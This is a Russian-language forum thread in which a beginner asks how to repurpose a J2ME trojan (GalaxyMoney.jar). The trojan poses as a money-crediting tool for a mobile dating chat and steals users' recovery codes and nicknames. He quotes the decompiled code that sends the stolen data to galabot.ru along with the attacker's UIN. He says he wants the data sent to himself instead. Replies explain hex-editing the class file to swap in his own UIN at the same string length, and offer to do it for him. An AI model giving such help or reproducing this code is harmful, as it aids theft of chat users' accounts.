Помогите разобратся. скажу сразу я новичок. имеется файл jar троян GalaxyMoney.jar предназначеный для зачисления денег на мобильный чат галактика знакомств . там вводиш код , имя и нужную сумму.далее жмёшь зачислить после чего приложение соединяется с интернетом .помоему фейк ворующий код и имя .посмотрев файлы расширением class я обнаружил paramDisplayable = (paramDisplayable = "http://galabot.ru/java/galamoney/?recover=" + t_recov + "&i=" + System.getProperty("microedition.platform") + "&nick=" + t_nick + "&summ=" + t_summ + "&uin=388802636").replace(' ', '_'); this.a.a(paramCommand); (this = new c(this)).a(paramDisplayable); там видно ( uin=388802636 ) . я так думаю туда летят код и имя . всего 4 файла class в приложении . - a b c d мне нужно сделать так чтобы код и имя летели ко мне на почту. где это ввести . и что именно ввести ?????????
решил изменить уин на свой и посмотреть аолетит чё или нет. с помощью DJ Java Decompiler 3.10 изменил уин. но сохраняется уже не в class а в java. долго читал как сделать обратно в class но так и не понял
если в своем следующем посте ты поставишь еще больше одинаковых знаков препинания, чем в топике, тогда помогу
ппц ты жестокий. 388802636 - это по виду как строка. Ну и кто тебе не дает взять любой Hex редактор (хотя бы тот же WinHex) и потом открыть нужный class файл, найти в нем этот код, затем заменить его на свой, сохранить и обратно запихнуть в jar череp WinRAR
FalcoN1 15.10.08, 16:35:27 KerchNET, А чего там сложного? Открываешь файл .class, ищешь текст, заменяешь на переведенный, выкидываешь файл .class, т.к. ты его запорол. Это щестнадцатеричные редакторы, хоть почитай в сети, что это есть такое что ли. Над тобой глумятся, а ты и не понимаешь. Конечно, в них можно любой бинарный файл отредактировать, но так-то знать надо, какие данные и по каким адресам менять.
Пля, конечно же ты навернешь файл, если изменишь длинну строки в большую или меньшую сторону, но тебе это не надо делать просто тупо перебивай номер на свой. Главное чтобы он был у тебя такой же длинны. А найти его - банальный поиск и никаких офсетов. Ну и если атм нет проверки crc данных (хотя я сомневаюсь что она будет) Если тебе впадлу открыть редактор и подправить, то выложи сюда файлик, тебе тут его и подправят. С этой задачей сможет справиться даже ребенок из детского сада, если ему сказать куда тыкать